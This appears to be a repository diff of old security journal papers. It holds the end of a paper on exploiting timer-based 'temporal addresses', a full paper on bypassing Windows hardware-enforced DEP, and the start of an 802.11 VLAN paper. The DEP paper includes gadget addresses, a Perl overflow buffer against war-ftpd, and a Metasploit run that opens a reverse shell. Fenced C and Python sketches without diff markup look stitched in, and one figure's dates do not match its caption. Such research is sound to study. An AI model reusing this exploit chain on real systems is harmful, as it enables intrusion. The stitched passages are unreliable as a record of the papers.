0x0012FE24 [Size=4, Scale=Counter, Period=70 msec]
|
||||
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FE9C [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
Judging from the source code of the example application it would seem clear
|
||||
that the address 0x0012ff7c coincides with the local variable t which is used
|
||||
to store the number of seconds since 1970. Indeed, the t variable also has an
|
||||
update period of one second as indicated by the telescope program. The other
|
||||
finds may be either inaccurate or not useful depending on the particular
|
||||
situation, but the fact that they were identified as counters instead
|
||||
of being relative to one of the two epoch times most likely makes them
|
||||
unusable.
|
||||
|
||||
In order to write an exploit that can leverage the temporal address t, it is
|
||||
first necessary to take the steps outlined in this document with regard to
|
||||
calculating the duration of each byte index and then building a list of all
|
||||
the viable opcode permutations. The duration of each byte index for a four
|
||||
byte timer with a one second period is shown in figure 8.1.
|
||||
|
||||
|
||||
Byte Index Seconds (ext)
|
||||
------------------------
|
||||
0 1 (1 sec)
|
||||
1 256 (4 mins 16 secs)
|
||||
2 65536 (18 hours 12 mins 16 secs)
|
||||
3 16777216 (194 days 4 hours 20 mins 16 secs)
|
||||
|
||||
Figure 8.1: 4 byte 1sec per-byte durations in seconds
|
||||
|
||||
|
||||
The starting byte index for this temporal address is byte index one due to the
|
||||
fact that it has the smallest feasible window of time for an exploit to be
|
||||
launched (4 mins 16 secs). After identifying this starting byte index,
|
||||
permutations for all the viable opcodes can be generated.
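As a simplified illustration of generating one such permutation, the sketch below finds the start of the next window in which a chosen two-byte sequence occupies byte indexes one and two of a four byte, one second timer. The function name is hypothetical, and the byte pair used in the usage note (ff e4, which encodes jmp esp on x86) is an example chosen here, not an entry taken from the paper's results.

```c
#include <stdint.h>

/*
 * Returns the timer value at which the next window starts, where a
 * window is the 256 second span during which byte index 1 equals b1 and
 * byte index 2 equals b2. If 'now' already lies inside such a window,
 * the start of that open window is returned. The addition wraps around
 * if the timer's four byte capacity is exceeded.
 */
uint32_t next_window_start(uint32_t now, uint8_t b1, uint8_t b2)
{
    uint32_t middle    = ((uint32_t)b2 << 16) | ((uint32_t)b1 << 8);
    uint32_t candidate = (now & 0xff000000u) | middle;

    if (candidate + 0xffu < now) {
        /* This cycle's window has passed; wait for byte index 3 to tick. */
        candidate += 0x01000000u;
    }
    return candidate;
}
```

For example, with the timer at 0x43000000 and the pair ff e4, the next window opens at 0x43e4ff00 and stays open for 256 seconds. Once it has passed, the same pair does not reappear until byte index three increments, about 194 days later.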
|
||||
|
||||
Nearly all of the viable opcode windows have a window of 4 minutes. Only a
|
||||
few have a window of 18 hours. To get a better idea for what the future has
|
||||
in store for a timer like this one, figure 8.2 shows the upcoming viable opcode
|
||||
windows for 2005.
|
||||
|
||||
|
||||
Date Opcode Group
|
||||
------------------------------------------
|
||||
Fri Sep 02 01:28:00 CDT 2005 [reg] => eip
|
||||
Thu Sep 08 21:18:24 CDT 2005 [reg] => eip
|
||||
Fri Sep 09 15:30:40 CDT 2005 [reg] => eip
|
||||
Sat Sep 10 09:42:56 CDT 2005 [reg] => eip
|
||||
Sun Sep 11 03:55:12 CDT 2005 [reg] => eip
|
||||
Tue Sep 13 10:32:00 CDT 2005 [reg] => eip
|
||||
Wed Sep 14 04:44:16 CDT 2005 [reg] => eip
|
||||
|
||||
Figure 8.2: Opcode windows for Sept 2005 - Jan 2006
|
||||
|
||||
|
||||
9) Conclusion
|
||||
|
||||
Temporal addresses are locations in memory that are tied to a timer of some
|
||||
sort, such as a variable storing the number of seconds since 1970. Like a
|
||||
clock, temporal addresses have an update period, meaning the rate at which their
|
||||
contents are changed. They also have an inherent storage capacity which
|
||||
limits the amount of time they can convey before being rolled back over to the
|
||||
start. Finally, temporal addresses will also always have a scale associated
|
||||
with them that indicates the unit of measure for the contents of a temporal
|
||||
address, such as whether it's simply being used as a counter or whether it's
|
||||
measuring the number of seconds since 1970. These three attributes together
|
||||
can be used to predict when certain byte combinations will occur within a
|
||||
temporal address.
|
||||
|
||||
This type of prediction is useful because it can allow an exploitation
|
||||
chronomancer the ability to wait until the time is right and then strike once
|
||||
predicted byte combinations occur in memory on a target machine. In
|
||||
particular, the byte combinations most useful would be ones that represent
|
||||
useful opcodes, or instructions, that could be used to gain control over
|
||||
execution flow and allow an attacker to exploit a vulnerability. Such an
|
||||
ability can give the added benefit of providing an attacker with universal
|
||||
return addresses in situations where a temporal address is found at a static
|
||||
location in memory across multiple operating system and application revisions.
|
||||
|
||||
An exploitation chronomancer is one who is capable of divining the best time
|
||||
to exploit something based on the alignment of certain bytes that occur
|
||||
naturally in a process' address space. By making use of the techniques
|
||||
described in this document, or perhaps ones that have yet to be described or
|
||||
disclosed, those who have yet to dabble in the field of chronomancy can begin
|
||||
to get their feet wet. Viable opcode windows will come and go, but the
|
||||
usefulness of temporal addresses will remain for eternity, or at least as long
|
||||
as computers as they are known today are around.
|
||||
|
||||
The fact of the matter is, though, that while the subject matter discussed in
|
||||
this document may have an inherent value, the likelihood of it being used for
|
||||
actual exploitation is slim to none due to the variance and delay between
|
||||
viable opcode windows for different periods and scales of temporal addresses.
|
||||
Or is it really that unlikely? Vlad902 suggested a scenario where an attacker
|
||||
could compromise an NTP server and configure it to constantly return a time
|
||||
that contains a useful opcode for exploitation purposes. All of the machines
|
||||
that synchronize with the compromised NTP server would then eventually have a
|
||||
predictable system time. While not completely foolproof considering it's not
|
||||
always known how often NTP clients will synchronize (although logs could be
|
||||
used), it's nonetheless an interesting approach. Regardless of feasibility,
|
||||
the slave that is knowledge demands to be free, and so it shall.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP).
|
||||
http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug
|
||||
5, 2005.
|
||||
|
||||
|
||||
Metasploit Project. The Metasploit Opcode Database.
|
||||
http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug
|
||||
6, 2005.
|
||||
|
||||
|
||||
Postel, J. RFC 792 - Internet Control Message Protocol.
|
||||
http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug
|
||||
5, 2005.
|
400
uninformed/2.3.txt
Normal file
|
@ -0,0 +1,400 @@
|
|||
Bypassing Windows Hardware-enforced Data Execution Prevention
|
||||
Oct 2, 2005
|
||||
|
||||
skape (mmiller@hick.org)
|
||||
Skywing (Skywing@valhallalegends.com)
|
||||
|
||||
One of the big changes that Microsoft introduced in Windows XP Service Pack 2
|
||||
and Windows 2003 Server Service Pack 1 was support for a new feature called Data
|
||||
Execution Prevention (DEP). This feature was added with the intention of doing
|
||||
exactly what its name implies: preventing the execution of code in
|
||||
non-executable memory regions. This is particularly important when it comes to
|
||||
preventing the exploitation of most software vulnerabilities because most
|
||||
exploits tend to rely on storing arbitrary code in what end up being
|
||||
non-executable memory regions, such as a thread stack or a process heap. There
|
||||
are other documented techniques for bypassing non-executable protections, such
|
||||
as returning into ZwProtectVirtualMemory or doing a chained ret2libc style
|
||||
attack, but these approaches tend to be more complicated and in many cases are
|
||||
more restricted due to the need to use bytes (such as NULL bytes) that would
|
||||
otherwise be unusable in common situations[1].
|
||||
|
||||
DEP itself is capable of functioning in two modes. The first mode is referred
|
||||
to as Software-enforced DEP. It provides fairly limited support for preventing
|
||||
the execution of code through exploits that take advantage of Structured
|
||||
Exception Handler (SEH) overwrites. Software-enforced DEP is used on
|
||||
machines that are not capable of supporting true non-executable pages due to
|
||||
inadequate hardware support. Software-enforced DEP is also a compile-time only
|
||||
change, and as such is typically limited to system libraries and select
|
||||
third-party applications that have been recompiled to take advantage of it.
|
||||
Bypassing this mode of DEP has been discussed before and is not the focus of
|
||||
this document.
|
||||
|
||||
The second mode in which DEP can operate is referred to as Hardware-enforced
|
||||
DEP. This mode is a superset of software-enforced DEP and is used on hardware
|
||||
that supports marking pages as non-executable. While most existing Intel-based
|
||||
hardware does not have this feature (due to legacy support for only marking
|
||||
pages as readable or writable), newer chipsets are beginning to have true
|
||||
hardware support through things like Physical Address Extension (PAE).
|
||||
Hardware-enforced DEP is the most interesting of the two modes since it can be
|
||||
seen as a truly mitigating factor to most common exploitation vectors. The
|
||||
bypass technique described in this document is designed to be used against
|
||||
this mode.
|
||||
|
||||
Before describing the technique, it is prudent to understand the parameters
|
||||
under which it will operate. In this case, the technique is meant to provide a
|
||||
way of executing code from regions of memory that would not typically be
|
||||
executable when hardware-enforced DEP is in use, such as a thread stack or a
|
||||
process heap. This technique can be seen as a means of eliminating DEP from the
|
||||
equation when it comes to writing exploits because the commonly used approach of
|
||||
executing custom code from a writable memory address can still be used.
|
||||
Furthermore, this technique is meant to be as generic as possible such that it
|
||||
can be used in both existing and new exploits without major modifications. With
|
||||
the parameters set, the next requirement is to understand some of the new
|
||||
features that compose hardware-enforced DEP.
|
||||
|
||||
When implementing support for DEP, Microsoft rightly realized that many existing
|
||||
third-party applications might run into major compatibility issues due to
|
||||
assumptions about whether or not a region of allocated memory is executable. In
|
||||
order to handle this situation, Microsoft designed DEP so that it could be
|
||||
configured in a few different manners. At the most general level, DEP is
|
||||
designed to have a default parameter that indicates whether or not
|
||||
non-executable protection is enabled only for system processes and custom
|
||||
defined applications (OptIn), or whether it's enabled for everything except for
|
||||
applications that are specifically exempted (OptOut). These two flags are
|
||||
passed to the kernel during boot through the /NoExecute option in boot.ini.
|
||||
Furthermore, two other flags can be passed as part of the NoExecute option to
|
||||
indicate that DEP should be AlwaysOn or AlwaysOff. These two settings force a
|
||||
flag to be set for each process that permanently enables or disables DEP. The
|
||||
default setting on Windows XP SP2 is OptIn, while the default setting on Windows
|
||||
2003 Server SP1 is OptOut.
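The four system-wide settings can be summarized with a small decision function. The sketch below is only a model of the policy as described in the paragraph above; the enum, the function, and its parameters are hypothetical names and do not correspond to any Windows API.

```c
#include <stdbool.h>

/* The four /NoExecute settings described above (illustrative names). */
typedef enum {
    DEP_OPT_IN,
    DEP_OPT_OUT,
    DEP_ALWAYS_ON,
    DEP_ALWAYS_OFF
} dep_policy_t;

/*
 * Returns true when non-executable protection would apply to a process.
 *   opted_in : the process is a system process or a custom defined
 *              application (only consulted under OptIn)
 *   exempted : the process has been specifically exempted
 *              (only consulted under OptOut)
 */
bool dep_applies(dep_policy_t policy, bool opted_in, bool exempted)
{
    switch (policy) {
    case DEP_ALWAYS_ON:  return true;
    case DEP_ALWAYS_OFF: return false;
    case DEP_OPT_IN:     return opted_in;
    case DEP_OPT_OUT:    return !exempted;
    }
    return false;
}
```

Under this model, an ordinary third-party application is unprotected by default on Windows XP SP2 (OptIn) but protected by default on Windows 2003 Server SP1 (OptOut).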
|
||||
|
||||
Aside from the global system parameter, DEP can also be enabled or disabled on a
|
||||
per-process basis. The disabling of non-executable (NX) support for a process
|
||||
is determined at execution time. To support this, a new internal routine was
|
||||
added to ntdll.dll called LdrpCheckNXCompatibility. This routine checks a few
|
||||
different things to determine whether or not NX support should be enabled for
|
||||
the process. The routine itself is called whenever a DLL is loaded in the
|
||||
context of a process through LdrpRunInitializationRoutines. The first check it
|
||||
performs is to see if a SafeDisc DLL is being loaded. If it is, NX support is
|
||||
flagged as needing to be disabled for the process. The second check it performs
|
||||
is to look in the application database for the process to see if NX support
|
||||
should be disabled or enabled. Lastly, it checks to see if the DLL that is
|
||||
being loaded is flagged as having an NX incompatible section (such as .aspack,
|
||||
.pcle, and .sforce).
|
||||
|
||||
As a result of these checks, NX support is either enabled or disabled through a
|
||||
new PROCESSINFOCLASS named ProcessExecuteFlags (0x22). When a call to
|
||||
NtSetInformationProcess is issued with this information class, a four byte
|
||||
bitmask is supplied as the buffer parameter. This bitmask is passed to
|
||||
nt!MmSetExecuteOptions which performs the appropriate operation. Optionally, a
|
||||
flag (MEM_EXECUTE_OPTION_PERMANENT, or 0x8) can also be specified as part of the
|
||||
bitmask that indicates that future calls to the function should fail such that
|
||||
the execute flags cannot be changed again. To enable NX support, the
|
||||
MEM_EXECUTE_OPTION_DISABLE flag (0x1) is specified. To disable NX support, the
|
||||
MEM_EXECUTE_OPTION_ENABLE flag (0x2) is specified. Depending on the state of
|
||||
these per-process flags, execution of code from non-executable memory regions
|
||||
will either be permitted (MEM_EXECUTE_OPTION_ENABLE) or denied
|
||||
(MEM_EXECUTE_OPTION_DISABLE).
|
||||
|
||||
If it were in some way possible for an attacker to change the execution flags of
|
||||
a process that is being exploited, then it follows that the attacker would be
|
||||
able to execute code from previously non-executable memory regions. In order to
|
||||
do this, though, the attacker would have to run code from regions of memory that
|
||||
are already executable. As chance would have it, there happen to be useful
|
||||
executable memory regions, and they exist at the same address in every process
|
||||
[2].
|
||||
|
||||
To take advantage of this feature, an attacker must somehow cause
|
||||
NtSetInformationProcess to be called with the ProcessExecuteFlags information
|
||||
class. Furthermore, the ProcessInformation parameter must be set to a bitmask
|
||||
that has the MEM_EXECUTE_OPTION_ENABLE bit set, but not the
|
||||
MEM_EXECUTE_OPTION_DISABLE bit set. The following code illustrates a call to
|
||||
this function that would disable NX support for the calling process:
|
||||
|
||||
|
||||
ULONG ExecuteFlags = MEM_EXECUTE_OPTION_ENABLE;
|
||||
|
||||
NtSetInformationProcess(
|
||||
NtCurrentProcess(), // (HANDLE)-1
|
||||
ProcessExecuteFlags, // 0x22
|
||||
&ExecuteFlags, // ptr to 0x2
|
||||
sizeof(ExecuteFlags)); // 0x4
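The meaning of the bitmask can be illustrated without calling into the kernel at all. The sketch below uses the flag values quoted in the text (0x1, 0x2, and 0x8) and encodes the condition stated above: execution from non-executable regions is permitted when the ENABLE bit is set and the DISABLE bit is not. The helper names are hypothetical, and how the kernel actually treats a mask with both bits set is not covered by this document, so the sketch simply reports such a mask as not meeting the stated condition.

```c
#include <stdbool.h>
#include <stdint.h>

/* Flag values as quoted in the text. */
#define MEM_EXECUTE_OPTION_DISABLE   0x1u
#define MEM_EXECUTE_OPTION_ENABLE    0x2u
#define MEM_EXECUTE_OPTION_PERMANENT 0x8u

/* True when the mask has ENABLE set and DISABLE clear (NX turned off). */
bool mask_permits_execution(uint32_t mask)
{
    return (mask & MEM_EXECUTE_OPTION_ENABLE) != 0 &&
           (mask & MEM_EXECUTE_OPTION_DISABLE) == 0;
}

/* True when the mask asks for later changes to be refused. */
bool mask_is_permanent(uint32_t mask)
{
    return (mask & MEM_EXECUTE_OPTION_PERMANENT) != 0;
}
```

The value 0x2 used in the snippet above satisfies the first check, while 0x9 (DISABLE combined with PERMANENT) describes a process whose NX support is enabled and locked.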
|
||||
|
||||
|
||||
One method of accomplishing this would be to use a ret2libc derived attack
|
||||
whereby control flow is transferred into the NtSetInformationProcess function
|
||||
with an attacker-controlled frame set up on the stack. In this case, the
|
||||
arguments described to the right in the above code snippet would have to be set
|
||||
up on the stack so that they would be interpreted correctly when
|
||||
NtSetInformationProcess begins executing. The biggest drawback to this approach
|
||||
is that it would require NULL bytes to be usable as part of the buffer that is
|
||||
used for the overflow. Generally speaking, this will not be possible,
|
||||
especially with any overflow that is caused through the use of a string
|
||||
function. However, when possible, this approach can certainly be useful.
|
||||
|
||||
Though a direct return into NtSetInformationProcess may not be universally
|
||||
feasible, another technique can be used that lends itself to being more
|
||||
generally applicable. Under this approach, the attacker can take advantage of
|
||||
code that already exists within ntdll for disabling NX support for a process.
|
||||
By returning into a specific chunk of code, it is possible to disable NX support
|
||||
just as ntdll would while still being able to transfer control back into a
|
||||
user-controlled buffer. The one limitation, however, is that the attacker must be
|
||||
able to control the stack in a way similar to most ret2libc style attacks, but
|
||||
without the need to control arguments.
|
||||
|
||||
The first step in this process is to cause control to be transferred to a
|
||||
location in memory that performs an operation that is equivalent to a mov al,
|
||||
0x1 / ret combination. Many instances of similar instructions exist (xor eax,
|
||||
eax/inc eax/ret; mov eax, 1/ret; etc). One such instance can be found in the
|
||||
ntdll!NtdllOkayToLockRoutine function.
|
||||
|
||||
|
||||
ntdll!NtdllOkayToLockRoutine:
|
||||
7c952080 b001 mov al,0x1
|
||||
7c952082 c20400 ret 0x4
|
||||
|
||||
|
||||
This will cause the low byte of eax to be set to one for reasons that will
|
||||
become apparent in the next step. Once control is transferred to the mov
|
||||
instruction, and then subsequently the ret instruction, the attacker must have
|
||||
set up the stack in such a way that the ret instruction actually returns into
|
||||
another segment of code inside ntdll. Specifically, it should return part of
|
||||
the way into the ntdll!LdrpCheckNXCompatibility routine.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x13:
|
||||
7c91d3f8 3c01 cmp al,0x1
|
||||
7c91d3fa 6a02 push 0x2
|
||||
7c91d3fc 5e pop esi
|
||||
7c91d3fd 0f84b72a0200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93feba)
|
||||
|
||||
|
||||
In this block, a check is made to see if the low byte of eax is set to one.
|
||||
Regardless of whether or not it is, esi is initialized to hold the value 2.
|
||||
After that, a check is made to see if the zero flag is set (as would be the case
|
||||
if the low byte of eax is 1). Since this code will be executed after the first
|
||||
mov al, 0x1 / ret set of instructions, the ZF flag will always be set, thus
|
||||
transferring control to 0x7c93feba.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x1a:
|
||||
7c93feba 8975fc mov [ebp-0x4],esi
|
||||
7c93febd e941d5fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c91d403)
|
||||
|
||||
|
||||
This block sets a local variable to the contents of esi, which in this case is
|
||||
2. Afterwards, it transfers control to 0x7c91d403.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x1d:
|
||||
7c91d403 837dfc00 cmp dword ptr [ebp-0x4],0x0
|
||||
7c91d407 0f8560890100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c935d6d)
|
||||
|
||||
|
||||
This block, in turn, compares the local variable that was just initialized to 2
|
||||
with 0. If it's not zero (which it won't be), control is transferred to
|
||||
0x7c935d6d.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x4d:
|
||||
7c935d6d 6a04 push 0x4
|
||||
7c935d6f 8d45fc lea eax,[ebp-0x4]
|
||||
7c935d72 50 push eax
|
||||
7c935d73 6a22 push 0x22
|
||||
7c935d75 6aff push 0xff
|
||||
7c935d77 e8b188fdff call ntdll!ZwSetInformationProcess (7c90e62d)
|
||||
7c935d7c e9c076feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c91d441)
|
||||
|
||||
|
||||
It's at this point that things begin to get interesting. In this block, a call
|
||||
is issued to NtSetInformationProcess with the ProcessExecuteFlags information
|
||||
class. The ProcessInformation pointer that is passed refers to the local variable previously
|
||||
initialized to 2 [3]. This results in NX support being disabled for the process.
|
||||
After the call completes, it transfers control to 0x7c91d441.
|
||||
|
||||
|
||||
ntdll!LdrpCheckNXCompatibility+0x5c:
|
||||
7c91d441 5e pop esi
|
||||
7c91d442 c9 leave
|
||||
7c91d443 c20400 ret 0x4
|
||||
|
||||
|
||||
Finally, this block simply restores saved registers, issues a leave instruction,
|
||||
and returns to the caller. In this case, the attacker will have set up the
|
||||
frame in such a way that the ret instruction actually returns into a general
|
||||
purpose instruction that transfers control into a controllable buffer that
|
||||
contains the arbitrary code to be executed now that NX support has been
|
||||
disabled.
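The branch sequence walked through above can be condensed into a small model. The Python sketch below is only an illustration of the control flow and is not code taken from ntdll; the names PROCESS_EXECUTE_FLAGS, MEM_EXECUTE_OPTION_ENABLE, CURRENT_PROCESS, and trace_nx_path are labels assumed here for the values 0x22, 2, and -1 that appear in the disassembly.

```python
# Toy model of the path through ntdll!LdrpCheckNXCompatibility described above.
# Nothing here touches a real process; it only records which steps would run.

PROCESS_EXECUTE_FLAGS = 0x22      # information class pushed at +0x4d (label assumed)
MEM_EXECUTE_OPTION_ENABLE = 0x2   # value held in the local at [ebp-0x4] (label assumed)
CURRENT_PROCESS = -1              # "push 0xff" is a sign-extended -1 pseudo-handle


def trace_nx_path(al):
    """Return the ordered steps taken when entering at +0x13 with the given al."""
    steps = []
    zero_flag = (al == 1)                      # cmp al, 0x1
    esi = MEM_EXECUTE_OPTION_ENABLE            # push 0x2 / pop esi (flags untouched)
    if not zero_flag:
        steps.append("je not taken; this path is not covered in the text")
        return steps
    local = esi                                # +0x1a: mov [ebp-0x4], esi
    steps.append("store %d in [ebp-0x4]" % local)
    if local != 0:                             # +0x1d: cmp dword ptr [ebp-0x4], 0 / jne
        steps.append(("ZwSetInformationProcess",
                      CURRENT_PROCESS, PROCESS_EXECUTE_FLAGS, local, 4))
    steps.append("pop esi / leave / ret 0x4")  # +0x5c
    return steps


if __name__ == "__main__":
    for step in trace_nx_path(al=1):
        print(step)
```

Calling trace_nx_path with al set to 1 lists the store to the local variable, the ZwSetInformationProcess call with its four arguments, and the final epilogue, which mirrors the order of the blocks shown above.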
|
||||
|
||||
This approach requires the knowledge of three addresses. First, the address of
|
||||
the mov al, 0x1 / ret equivalent must be known. Fortunately, there are many
|
||||
occurrences of this type of block, though they may not be as simplistic as the
|
||||
one described in this document. Second, the address of the start of the cmp al,
|
||||
0x1 block inside ntdll!LdrpCheckNXCompatibility must be known. By depending on
|
||||
two addresses within ntdll, it stands to reason that an exploit can be more
|
||||
portable than if one were to depend on addresses from two different DLLs.
|
||||
Finally, the third address is the return address that would typically be
|
||||
used on targets that didn't have hardware-enforced DEP, such as a jmp esp or
|
||||
equivalent instruction depending on the vulnerability in question.
|
||||
|
||||
Aside from specific address limitations, this approach also relies on the fact
|
||||
that ebp is pointed to a valid, writable address such that the value that
|
||||
indicates that NX support should be disabled can be temporarily stored. This
|
||||
can be accomplished a few different ways, depending on the vulnerability, so it
|
||||
is not seen as a largely limiting factor.
|
||||
|
||||
To test this approach, the authors modified the warftpd_165_user exploit from
|
||||
the Metasploit Framework that was written by Fairuzan Roslan. This
|
||||
vulnerability is a simple stack overflow. Prior to our modifications, the
|
||||
exploit was implemented in the following manner:
|
||||
|
||||
|
||||
my $evil = $self->MakeNops(1024);
|
||||
substr($evil, 485, 4, pack("V", $target->[1]));
|
||||
substr($evil, 600, length($shellcode), $shellcode);
|
||||
|
||||
|
||||
This code built a NOP sled of 1024 bytes. At byte index 485, the return address
|
||||
was stored after which point the shellcode was appended [4]. When run against a target
|
||||
that supports hardware-enforced DEP, the exploit fails when it tries to execute
|
||||
the first instruction of the NOP sled because the region of memory (the thread
|
||||
stack) is marked as non-executable.
|
||||
|
||||
Applying the technique described above, the authors changed the exploit to send
|
||||
a buffer structured as follows:
|
||||
|
||||
|
||||
my $evil = "\xcc" x 485;
|
||||
$evil .= "\x80\x20\x95\x7c";
|
||||
$evil .= "\xff\xff\xff\xff";
|
||||
$evil .= "\xf8\xd3\x91\x7c";
|
||||
$evil .= "\xff\xff\xff\xff";
|
||||
$evil .= "\xcc" x 0x54;
|
||||
$evil .= pack("V", $target->[1]);
|
||||
$evil .= $shellcode;
|
||||
$evil .= "\xcc" x (1024 - length($evil));
|
||||
|
||||
|
||||
In this case, a buffer was built that contained 485 int3 instructions. From
|
||||
there, the buffer was set to overwrite the return address with a pointer to
|
||||
ntdll!NtdllOkayToLockRoutine. Since this routine does a retn 0x4, the next four
|
||||
bytes are padding as a fake argument that is popped off the stack. Once
|
||||
NtdllOkayToLockRoutine returns, the stack would point 493 bytes into the evil
|
||||
buffer that is being built (immediately after the 0x7c952080 return address
|
||||
overwrite and the fake argument). This means that NtdllOkayToLockRoutine would
|
||||
return into 0x7c91d3f8. This block of code is what evaluates the low byte of
|
||||
eax and eventually leads to the disabling of NX support for the process. Once
|
||||
completed, the block pops saved registers off the stack and issues a leave
|
||||
instruction, moving the stack pointer to where ebp currently points. In this
|
||||
case, ebp was 0x54 bytes away from esp, so we inserted 0x54 bytes of padding.
|
||||
Once the block does this, the stack pointer will point 585 bytes into the evil
|
||||
buffer (immediately after the 0x54 bytes of padding). This means that it will
|
||||
return into whatever address is stored at this location. In this case, the
|
||||
buffer is populated such that it simply returns into the target-specified return
|
||||
address (which is a jmp esp equivalent instruction). From there, the jmp esp
|
||||
instruction is executed which transfers control into the shellcode that
|
||||
immediately follows it. Once executed, the exploit works as if nothing had
|
||||
changed:
|
||||
|
||||
$ ./msfcli warftpd_165_user_dep RHOST=192.168.244.128 RPORT=4446 \
|
||||
LHOST=192.168.244.2 LPORT=4444 PAYLOAD=win32_reverse TARGET=2 E
|
||||
[*] Starting Reverse Handler.
|
||||
[*] Trying Windows XP SP2 English using return address 0x71ab9372....
|
||||
[*] 220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
|
||||
[*] Sending evil buffer....
|
||||
[*] Got connection from 192.168.244.2:4444 <-> 192.168.244.128:46638
|
||||
|
||||
Microsoft Windows XP [Version 5.1.2600]
|
||||
(C) Copyright 1985-2001 Microsoft Corp.
|
||||
|
||||
C:\Program Files\War-ftpd>
|
||||
|
||||
|
||||
As can be seen, the technique described in this document outlines a feasible
|
||||
method that can be used to circumvent the security enhancements provided by
|
||||
hardware-enforced DEP in the default installations of Windows XP Service Pack 2
|
||||
and Windows 2003 Server Service Pack 1. The flaw itself is not related to any
|
||||
specific inefficiency or mistake made during the actual implementation of
|
||||
hardware-enforced DEP support, but instead is a side effect of a design decision
|
||||
by Microsoft to provide a mechanism for disabling NX support for a process from
|
||||
within a user-mode process. Had it been the case that there was no mechanism by
|
||||
which NX support could be disabled at runtime from within a process, the
|
||||
approaches outlined in this document would not be feasible.
|
||||
|
||||
In the interest of not presenting a problem without also describing a solution,
|
||||
the authors have identified a few different ways in which Microsoft might be
|
||||
able to solve this. To prevent this approach, it is first necessary to identify
|
||||
the things that it depends on. First and foremost, the technique depends on
|
||||
knowing the location of three separate addresses. Second, it depends on the
|
||||
feature being exposed that allows a user-mode process to disable NX support for
|
||||
itself. Finally, it depends on the ability to control the stack in a manner
|
||||
that allows it to perform a ret2libc style attack [5].
|
||||
|
||||
The first dependency could be broken by instituting some form of Address Space
|
||||
Layout Randomization that would thereby make the location of the dependent code
|
||||
blocks unknown to an attacker. The second dependency could be broken by moving
|
||||
the logic that controls the enabling and disabling of a process' NX support to
|
||||
kernel-mode such that it cannot be influenced in such a direct manner. This
|
||||
approach is slightly challenging considering the model that it is currently
|
||||
implemented under requires the ability to disable NX support when certain events
|
||||
(such as the loading of an incompatible DLL) occur. Although it may be more
|
||||
challenging, the authors see this as being the most feasible approach in terms
|
||||
of compatibility. Lastly, the final dependency is not really something that
|
||||
Microsoft can control. Aside from these potential solutions, it might also be
|
||||
possible to come up with a way to make it so the permanent flag is set sooner in
|
||||
the process' initialization, though the authors are not sure of a way in which
|
||||
this could be made possible without breaking support for disabling when certain
|
||||
DLLs are loaded.
|
||||
|
||||
In closing, the authors would like to make a special point to indicate that
|
||||
Microsoft has done an excellent job in raising the bar with their security
|
||||
improvements in XP Service Pack 2. The technique outlined in this document
|
||||
should not be seen as a case of Microsoft failing to implement something
|
||||
securely, as the provisions are certainly there to deploy hardware-enforced DEP
|
||||
in a secure fashion, but instead might be better viewed as a concession that was
|
||||
made to ensure that application compatibility was retained for the general case.
|
||||
There is almost always a trade-off when it comes to providing new security
|
||||
features in the face of potential compatibility problems, and it can be said
|
||||
that perhaps no company is better known than Microsoft for retaining
|
||||
backward compatibility.
|
||||
|
||||
|
||||
Footnotes
|
||||
|
||||
[1] There are other documented techniques for bypassing non-executable
|
||||
protections, such as returning into ZwProtectVirtualMemory or doing a chained
|
||||
ret2libc style attack, but these approaches tend to be more complicated and in
|
||||
many cases are more restricted due to the need to use bytes (such as NULL
|
||||
bytes) that would otherwise be unusable in common situations.
|
||||
|
||||
[2] With a few parameters that will be discussed later.
|
||||
|
||||
[3] The reason this has to point to 2 and not some integer that has just the low
|
||||
byte set to 2 is because nt!MmSetExecutionOptions has a check to ensure that the
|
||||
unused bits are not set.
|
||||
|
||||
[4] In reality, it may not be the return address that is being overwritten, but
|
||||
instead might be a function pointer. The fact that it is at a misaligned
|
||||
address lends credence to this fact, though it is certainly not a clear
|
||||
indication.
|
||||
|
||||
[5] This is possible even when an SEH overwrite is leveraged, given the right
|
||||
conditions. The basic approach is to locate a pop reg, pop reg, pop esp, ret
|
||||
instruction set in a region that is not protected by SafeSEH (such as a
|
||||
third-party DLL that was not linked with /SAFESEH). The pop esp shifts the stack
|
||||
to the start of the EstablisherFrame that is controlled by the attacker and the
|
||||
ret returns into the address stored within the overwritten Next pointer. If one
|
||||
were to set the Next pointer to the location of the NtdllOkayToLockRoutine and
|
||||
the stack were set up as explained above, the technique used to bypass
|
||||
hardware-enforced DEP that is described in this document could be made to work.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
The Metasploit Project. War-ftpd 1.65 USER Overflow.
|
||||
http://www.metasploit.com/projects/Framework/exploits.html#warftpd_165_user;
|
||||
accessed Oct 2, 2005.
|
||||
|
||||
Microsoft Corporation. Data Execution Prevention.
|
||||
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/BookofSP1/b0de1052-4101-44c3-a294-4da1bd1ef227.mspx;
|
||||
accessed Oct 2, 2005.
|
235
uninformed/2.4.txt
Normal file
|
@ -0,0 +1,235 @@
|
|||
802.11 VLANs
|
||||
Johnny Cache
|
||||
johnycsh@gmail.com
|
||||
Last modified: 09/07/05
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: The goal of this paper is to introduce the reader to association
|
||||
redirection and how it could be used to implement something analogous to VLANs
|
||||
found in wired media into a typical IEEE 802.11 environment. What makes this
|
||||
technique interesting is that it can be accomplished without breaking the IEEE
|
||||
802.11 standard on the client side, and requires only minor changes made to the
|
||||
Access Point (AP). No modifications are made to the 802.11 MAC. It is the
|
||||
